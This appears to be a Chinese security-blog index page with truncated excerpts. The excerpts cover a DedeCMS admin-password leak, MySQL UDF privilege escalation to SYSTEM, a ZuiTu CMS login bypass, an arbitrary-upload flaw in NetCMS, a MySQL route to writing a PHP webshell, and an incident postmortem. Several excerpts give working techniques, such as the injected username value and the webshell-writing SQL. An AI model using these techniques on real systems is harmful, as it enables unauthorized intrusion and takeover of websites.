某天,在乌云上看到dede Oday,可以查询到管理员密码。测试,证实0day有效,正欲将admin密码拿去解密时,突然发现这个字符串竟然是20位的,一般像CMD5.COM等网站查只有16、32或40位的,但从没见过20位的呀。网上寻求破解,官方有个工具,需要将文件传到根目录才可以用,看来无望了...... 不过还好,可以拿出来分析分析: else if($step==3){ $pwdm = ''…
MYSQL的弱口令可以通过提权拿到系统权限,不过有个前提,就是知道目标主机账号和密码,才能进行提权。不过,WEBSHELL获得了,找mysql账号应该也不是什么难事 ...... 一般来说连接MYSQL的帐户密码非常好找,比如config.php、conn.php等,找到后先用SQL Query 测试连接,如图: 连接成功,现在开始将 Mix.dll& My_udf.dll 上传(Mix.…
一、功能 利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。 二、适用场合 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 三、使用…
我们以官方站做测试演示(在火狐浏览器环境下):http://demo.zuitu.com/manage/login.php 用Firebug将username 字段改为: username[=0x7c or manager=1#] 修改完毕,用户名密码随便输,即可直接进入后台。 后台拿webshell: 点击--->设置--->模版--->选择about_jo…
发布日期:2010-08.24 发布作者:chovil 影响版本:未知 官方地址:www.aspxcms.com/ 漏洞描述:NetCMS网站内容管理系统是国内最优秀的网站建设程序,全免费全开源 漏洞分析:由于发表消息附件未进行严格过滤,导致可上传任意文件漏洞。 测试利用: 1、然后进去, /user/login.aspx,点注册。 2、在发表文章页面,点击“选择图片”,我们在这里,记下这个目录名…
1、第一种方法 CREATE TABLE 'mysql'.'study' ('7on' TEXT NOT NULL ); INSERT INTO 'mysql'.'study' ('7on' )VALUES ('<?php @e…
EMail: jianxin#80sec.com Site: http://www.80sec.com Date: 2011-11-30 From:http://www.80sec.com/ 一、事件背景 在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击的分析结果来看,我们觉得…